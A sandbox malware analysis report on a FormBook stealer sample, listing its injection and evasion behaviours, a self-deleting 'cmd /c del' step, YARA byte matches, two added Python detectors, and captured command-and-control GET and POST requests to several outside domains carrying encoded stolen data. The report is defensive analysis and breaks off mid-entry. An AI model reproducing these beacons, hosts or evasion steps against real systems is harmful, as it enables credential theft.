
Analysis Report itres.bin

Overview

General Information

Sample Name: itres.bin (renamed file extension from bin to exe)
Analysis ID: 287347
MD5: f028d6c9991258c5c75e9f234d4dee79
SHA1: 2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e
SHA256: 576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • itres.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\itres.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)
    • itres.exe (PID: 4468 cmdline: C:\Users\user\Desktop\itres.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 3352 cmdline: /c del 'C:\Users\user\Desktop\itres.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
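Two process-tree checks that fire on the chain shown above, as an added example (not part of the Joe Sandbox report). PIDs, command lines and the image paths the report prints are reused; the image paths for explorer.exe and cmd.exe (the report gives only their hashes), the Sysmon-style record layout and the parent of PID 2224 are assumptions. The report draws the injected processes (explorer.exe, systray.exe) as children of the process that injected into them; the example keeps those edges as parent links.

```python
"""Added example: two process-tree rules over constructed events that
mirror the Startup tree of the report (not Joe Sandbox's own logic)."""
import re

# Constructed Sysmon-style events. ppid 1 for PID 2224 means "parent not
# captured"; explorer.exe and cmd.exe image paths are assumed.
EVENTS = [
    {"pid": 2224, "ppid": 1, "image": r"C:\Users\user\Desktop\itres.exe",
     "cmdline": r"'C:\Users\user\Desktop\itres.exe'"},
    {"pid": 4468, "ppid": 2224, "image": r"C:\Users\user\Desktop\itres.exe",
     "cmdline": r"C:\Users\user\Desktop\itres.exe"},
    {"pid": 3384, "ppid": 4468, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 6068, "ppid": 3384, "image": r"C:\Windows\SysWOW64\systray.exe",
     "cmdline": r"C:\Windows\SysWOW64\systray.exe"},
    {"pid": 3352, "ppid": 6068, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\itres.exe'"},
    {"pid": 4324, "ppid": 3352, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

USER_DIR = re.compile(r"^C:\\Users\\", re.IGNORECASE)
SYSTEM_DIR = re.compile(r"^C:\\Windows\\(System32|SysWOW64)\\", re.IGNORECASE)
DEL_CMD = re.compile(r"/c\s+del\s+['\"]?([^'\"]+)['\"]?", re.IGNORECASE)


def ancestors(by_pid, pid):
    """Walk parent links upward from pid (cycle-safe)."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]


def detect(events):
    """Return (rule, pid) findings for the two injection-chain patterns."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        # 1. A binary in a user-writable directory starting a copy of itself:
        #    the first step of the suspended-child / hollowing technique the
        #    report flags ("Creates a process in suspended mode").
        if (parent and parent["image"].lower() == e["image"].lower()
                and USER_DIR.match(e["image"])):
            findings.append(("self_spawn_from_user_dir", e["pid"]))
        # 2. cmd.exe launched by a Windows system binary to delete a file that
        #    is an earlier process image in the same chain: the dropper
        #    erasing itself after migrating into a system process.
        m = DEL_CMD.search(e["cmdline"])
        if (m and e["image"].lower().endswith("\\cmd.exe")
                and parent and SYSTEM_DIR.match(parent["image"])
                and not parent["image"].lower().endswith("\\cmd.exe")):
            target = m.group(1).strip().lower()
            if any(a["image"].lower() == target for a in ancestors(by_pid, e["ppid"])):
                findings.append(("system_binary_deletes_ancestor_dropper", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 deliberately requires the deleted path to match an ancestor image rather than any file: a system binary deleting an arbitrary temp file is common, a system binary deleting the executable that sits above it in the tree is not.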

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further memory-dump entries not shown on this page)

      Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)
1.2.itres.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.itres.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.itres.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x153d9:$sqlite3step: 68 34 1C 7B E1
    • 0x154ec:$sqlite3step: 68 34 1C 7B E1
    • 0x15408:$sqlite3text: 68 38 2A 90 C5
    • 0x1552d:$sqlite3text: 68 38 2A 90 C5
    • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
1.2.itres.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.itres.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown on this page)
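A minimal stand-in for the byte-sequence matching that the two community YARA rules above perform, run over a constructed buffer, as an added example (not the rules themselves and not code from the report). The byte sequences and the offsets used to lay out the buffer are copied from the Unpacked PEs rows; the match thresholds are assumptions, since the page shows each rule's strings but not its condition clause. $sequence_0 is worth reading: it decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, which is the RDTSC timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature.

```python
"""Added example: byte-sequence scanning equivalent to the listed YARA
strings, over a constructed buffer. Thresholds in formbook_verdict are
assumed, not the real rules' conditions."""
import struct

# JPCERT/CC "Formbook" strings. Each is a 5-byte `push imm32` (opcode 0x68)
# whose immediate the rule names after a sqlite3 API.
JPCERT_STRINGS = {
    "$sqlite3step": bytes.fromhex("68341C7BE1"),
    "$sqlite3text": bytes.fromhex("68382A90C5"),
    "$sqlite3blob": bytes.fromhex("6853D87F8C"),
}

# yara-signator "Formbook_1" strings (x86 opcode sequences).
# $sequence_0: add ecx, eax ; rdtsc ; sub eax, ecx ; mov [ebp-4], eax
SIGNATOR_STRINGS = {
    "$sequence_0": bytes.fromhex("03C80F312BC18945FC"),
    "$sequence_1": bytes.fromhex("3C240F8476FFFFFF3C257494"),
    "$sequence_2": bytes.fromhex("3B4F14739585C97491"),
    "$sequence_3": bytes.fromhex("3C6975448B7D188B0F"),
    "$sequence_4": bytes.fromhex("5DC38D507C80FA07"),
    "$sequence_5": bytes.fromhex("0FBE5C0E010FB6540E0283E30FC1EA06"),
    "$sequence_6": bytes.fromhex("578945FC8945F48945F8"),
    "$sequence_7": bytes.fromhex("66890C025B8BE55D"),
    "$sequence_8": bytes.fromhex("3C5474043C7475F4"),
    "$sequence_9": bytes.fromhex("5668030100008D8595FEFFFF6A00"),
}
ALL_STRINGS = {**JPCERT_STRINGS, **SIGNATOR_STRINGS}

# Offsets from the 1.2.itres.exe.400000.0.unpack rows; the buffer built from
# them is constructed (0x90 filler), not the sample's code.
SAMPLE_LAYOUT = [
    (0x77d8, "$sequence_0"), (0x7b62, "$sequence_0"), (0x13475, "$sequence_1"),
    (0x12f61, "$sequence_2"), (0x13577, "$sequence_3"), (0x136ef, "$sequence_4"),
    (0x857a, "$sequence_5"), (0x121dc, "$sequence_6"), (0x92f2, "$sequence_7"),
    (0x182f7, "$sequence_8"), (0x1936a, "$sequence_9"),
    (0x153d9, "$sqlite3step"), (0x154ec, "$sqlite3step"),
    (0x15408, "$sqlite3text"), (0x1552d, "$sqlite3text"),
    (0x1541b, "$sqlite3blob"), (0x15543, "$sqlite3blob"),
]


def build_sample(layout, size=0x20000, fill=0x90):
    """Constructed 128 KiB buffer with the listed sequences at their offsets."""
    buf = bytearray([fill]) * size
    for off, name in layout:
        seq = ALL_STRINGS[name]
        buf[off:off + len(seq)] = seq
    return bytes(buf)


def find_all(buf, needle):
    """All (possibly overlapping) offsets of needle in buf."""
    offs, i = [], buf.find(needle)
    while i != -1:
        offs.append(i)
        i = buf.find(needle, i + 1)
    return offs


def scan(buf, strings):
    """Map each string name to the offsets where it occurs."""
    return {name: find_all(buf, seq) for name, seq in strings.items()}


def push_imm32(seq):
    """Decode a `push imm32` string to its little-endian immediate."""
    if len(seq) != 5 or seq[0] != 0x68:
        raise ValueError("not a 5-byte push imm32")
    return struct.unpack("<I", seq[1:])[0]


def formbook_verdict(buf, jpcert_min=3, signator_min=7):
    """Assumed conditions: all three JPCERT strings present, and at least 7
    of the 10 signator sequences. Returns hit counts and per-rule verdicts."""
    j_hits = sum(1 for v in scan(buf, JPCERT_STRINGS).values() if v)
    s_hits = sum(1 for v in scan(buf, SIGNATOR_STRINGS).values() if v)
    return {"jpcert_hits": j_hits, "signator_hits": s_hits,
            "jpcert": j_hits >= jpcert_min, "signator": s_hits >= signator_min}


if __name__ == "__main__":
    dump = build_sample(SAMPLE_LAYOUT)
    for name, offs in scan(dump, ALL_STRINGS).items():
        print(name, [hex(o) for o in offs])
    print(formbook_verdict(dump))
```

Pointing scan() at a real memory dump (the .sdmp files above, read as bytes) reproduces the offsets in the table; the memory-dump offsets differ from the unpacked-PE ones by a constant 0xC00 because the dump starts 0xC00 bytes earlier than the unpacked image.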

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Multi AV Scanner detection for submitted file
Source: itres.exe | Virustotal: Detection: 56%
Source: itres.exe | ReversingLabs: Detection: 58%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: itres.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.itres.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2

Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E7F460 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E7F459 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E7F585 FindFirstFileW,FindNextFileW,FindClose
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\itres.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-44h] | 0_2_00A5CA70
Source: C:\Users\user\Desktop\itres.exe | Code function: 4x nop then jmp 00A5DB82h | 0_2_00A5CF79
Source: C:\Users\user\Desktop\itres.exe | Code function: 4x nop then pop edi | 1_2_00415001
Source: C:\Users\user\Desktop\itres.exe | Code function: 4x nop then pop edi | 1_2_0040C119
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi | 4_2_02E85001
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi | 4_2_02E7C119

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49739
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49741
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49751
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49755
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.brasserie-lafayette.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JajlTyMmOo22K&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.isabellelinhnguyen.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=3ubZ5tRrxIfN41eqqpIj22VrlW9j75JM4xICI34kih2i+rqjsIMd825CVukfAvIDWxA7&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.smalltownlawns.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjA0pYsAdDrMj&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.thebardi.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=/wmggT2FDua6/uf0m8vYUW9XM6JdOK3pq1DkZ95mxMYTiU7Z21xlQY1juaca7pTz06oP&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.connerparty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1HyKj92Df3q0&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.nola3d.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=C15d5iwTKlKsI3rAXZsLwlTuGsAeQEM+ckQv/EOsC4DDktzSY592Fv+KLrtwSAQYGPi+&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.23works.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oWYtlCk9w&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.nittayabeauty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.keebcat.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFR/144BWYfki&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.ashleygrady.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&2dGH_=lhdDpBZXt0P HTTP/1.1
  Host: www.clicrhonealpes.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 209.99.40.222
Source: Joe Sandbox View | IP Address: 164.132.235.17
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.isabellelinhnguyen.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.isabellelinhnguyen.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.isabellelinhnguyen.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=SJW9ychPIpqW9TCL8JhrsNHWePXfPPKcVuW6(KzXMNfX5uTdN3(LVZWIJQFD1fDe~mGdwALuU74QkFVpVLSsSvh2BUD5wfGnLc6btTtrDfv2xCChsT23tRbjrB(nLFmRICXwT9Zxf4GJNW0GJkw9AHHstbY5eXO3QB1Ubsfov40tb_dRCZK8hbK2lj(-nDq5GsOAR8iTXMmuoQRz3ToKPvWSrlZzBRyvUUy0hRNXw0OMF3WvhDlo5wnaUVbqCkGJom9VJsdJnYZSIpBkzCXHGIgd7EyW3QuM~mmPJRToNQ4nJloUcxmzzeUH7VophW9JtEoNbvFNSjVmSDL8u8aslP0moLEieEIubTxBIqAwdS4ICPHSXCD4SRtjgupndYxz7goVOxVqgvw2fezjxw).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.smalltownlawns.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.smalltownlawns.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.smalltownlawns.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=4svjnIce9qHksFf8qO1Vjm9Ss1UwtqdX9UpBOwgLuC63w4mVrKVz7xlGXfslSfYIAFcJ0kyIgUBrzXxPGXQY1teucE0bhtJElTuBea~mag1_44UZNu9g03l6YoNLU7K95080frrJ8kdUlK3eRfZJvP(y(YpJC4R7JucGSmllbSThjgzpL4nmMW5TNM3IZsmrNPmYG_3mQzn9Sigo17CMtR1BWzNoBFo2zwNTSVIZUvHj~PjSh36hBxksIalTFh(pnJNsfsuzqD5pawbwFQD6TojNWD7R2q1JauBO1ixJctx0z_cQgjc9vF7_QCEd0z~KF-B3yeGXk8pRbBCqQeFuztKtjq2xOAjnoKBUDNr0sb2CdSwvQGZMJgI1XeFBPCt26Z9GwWn3T1oP0YMBzw).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.thebardi.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.thebardi.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.thebardi.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=74EVgopeHwlRX3BPVCHqs6mrDAR0AyQoELw4FLpAk_SfPvMuVrDjqhTGhgEGLNggaasDLLtXUcZ5lOU66tV9t_UEZj4MfHYZBX2MBZWjFkdsDAdJBq5sP2PpIr8vBxBv1WmEgT75QMEb05Y95GhoKEPJSsY_pJrQq2DcaCo9k7L6J5h0zwFcPt8kTqVAe5cF~sHD2o4GaP5ABAywLBNtGE83QNnjIFG9e1FFPvqTLnEwtIa5(u(FaBIybrhW1nzD3QoOy887x37IedFaSXNMKU0xuOTGuPrLf-Ak1-I2HsY2hesKcmjU0BxesHpT9FOqDE2B0FH20uVguELb9epSIVpAXDZZVLDDB6JP~npzHwtpNwVxSzewfzkfViOt1YiiW_CSMlDBDRnkmUWjuw).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.connerparty.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.connerparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.connerparty.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=wySa~3atFc~Eo8iK7oilES84CoIKIbf70iKRBv57yNE3zkLRnn4CDul6s7d897TFn8oizxDQmyqOhuElxEwxW7uKYQs0W2xmkV8hJ4udYp~mpfi-Kpx-FNvkQqIXjA2FDseVAbqcRGvtXsgeipYz62BxcYebrmWtln0uwD7lK4Nky6ar3EH0kYHVahKQI7U-E38RNzDGMqyy5UflokO55ev_sFu82S36RGKITKjGSnDlnnKvqWaruQIsNBMnOue5zjG7QS~oNl6Goe6YJD5wDKHV(KJ0RA7dHXfapkw57FIgMfzJDK133jSj8RH6Pz02uNNgXO~I~6DUvim-k_6qvAOsFRDRH721n7XNZ6Qr8XZ8JuGuGZlQuPd5mJYIvzrIHO5n5HdAwXJBrB67DA).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.nola3d.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.nola3d.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.nola3d.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=IPZAFiYVXMXNzJqA3iZBs8N7n98XJc4T6kAl1kvvs7uVbwxbmH9DpS~XvRfpw_vRBCeLNHXpem6FbyqdY-1cLylTT8k7wqxMbepGm8TA5ynQH07IWkBOWKo7W3yZjagrfaDLoaaBKQt3~DxjUfBcT6qTDn0RqMU5mzfdLknFOna6bwbibZoSur276hDi98qSZVtRwsTdmpXazQnkjLhCoL16NRv_iGBe0d8-Zf6LPxdjNS2faoqjGp38IqN1MZiz(SsjG4yH(lrV0lHZZhuUQfYE~RHaSza42TMdHM(viWiRiP474icI63v-sDctqoU9nSwN4izlp0vi5BT65ZoUq31pGTpkeqcvLaQQf4CQ2EVtou3jFPZCcM51LURQx7b9EqBRelN_NseJc1ODAQ).
Source: global traffic | HTTP traffic detected:
